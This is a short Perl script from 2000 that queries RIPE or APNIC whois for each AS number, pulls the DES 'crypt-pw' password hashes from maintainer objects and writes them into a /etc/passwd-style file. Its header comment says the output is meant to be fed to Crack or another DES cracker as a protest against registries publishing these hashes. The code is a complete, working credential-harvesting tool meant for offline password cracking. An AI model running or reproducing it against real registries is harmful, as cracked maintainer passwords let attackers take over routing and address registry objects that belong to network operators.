#!/usr/bin/perl -w
#
# Brute force create a /etc/passwd-like file with DES-encrypted passwords
# from dumb whois lookups on RIPE and APNIC.  Can be easily modified
# to handle RADB too.  Once the file is created, run Crack (or your favourite
# DES-crack program) on it and create some headache for the ``Internet
# community'' which has decided to reveal DES-encoded passwords as part
# of a whois lookup on a maintainer object.
#
# Copyright 2000, Raju Mathur <raju@linux-delhi.org>, <raju@kandalaya.org>
#
# This program is available under the terms of the GNU General Public License
#
use strict ;
#
# Currently will work on RIPE and APNIC
#
my
  $count = 0 ;
my
  $outfile = shift ;
my
  $registry = shift ;
if ( !defined $outfile || !defined $registry
     || $registry !~ /apnic/i && $registry !~ /ripe/i )
{
  print STDERR "usage: $0 output-file APNIC|RIPE [start AS] [end AS]\n" ;
  exit 1 ;
}
open OUT , ">$outfile"
  or die "Cannot write to $outfile: $!\n" ;
my
  $startas = shift ;
$startas = 1
  if !defined $startas ;
my
  $endas = shift ;
$endas = 12000
  if !defined $endas ;
my
  $server = "whois.apnic.net" ;
$server = "whois.ripe.net"
  if $registry =~ /ripe/i ;
my
  $maintainer ;
my
  $descr ;
my
  $notify ;
my
  $auth ;
my
  $passwd ;
foreach my $i ( $startas..$endas )
{
  print "*** AS$i\n" ;
  open WHOIS , "whois AS$i\@$server|"
    or die "Cannot whois AS$i: $!\n" ;
  while ( <WHOIS> )
  {
    if ( /^mnt-by:\s*(.*)/ )
    {
      $maintainer = $1 ;
      last ;
    }
  }
  close WHOIS ;
  next
    if !$maintainer ;
  print "*** $maintainer\n" ;
  open WHOIS , "whois $maintainer\@$server|"
    or die "Cannot whois $maintainer: $!\n" ;
  $descr = "" ;
  while ( <WHOIS> )
  {
    if ( $_ =~ /^descr:\s*(.*)/ )
    {
      $descr .= "$1, " ;
    }
    if ( $_ =~ /^mnt-nfy:\s*(.*)/ )
    {
      $notify = $1 ;
    }
    if ( $_ =~ /^auth:\s*(.*)/ )
    {
      $auth = $1 ;
    }
    last if $auth && $auth =~ /crypt-pw/i ;
  }
  next
    if !$auth || $auth !~ /crypt-pw/i ;
print "*** <$descr> <$notify> <$auth>\n" ;
  close WHOIS ;
  $auth =~ /.*crypt-pw\s*(.*)/i ;
  $passwd = $1 ;
  $descr =~ s/[\n:]//g ;
  $notify =~ s/://g ;
  print OUT "$maintainer:$passwd:42:42:$descr:/dev/null:/bin/sh\n" ;
  $auth = "" ;
  $count++ ;
}
close OUT ;
print "$count records\n" ;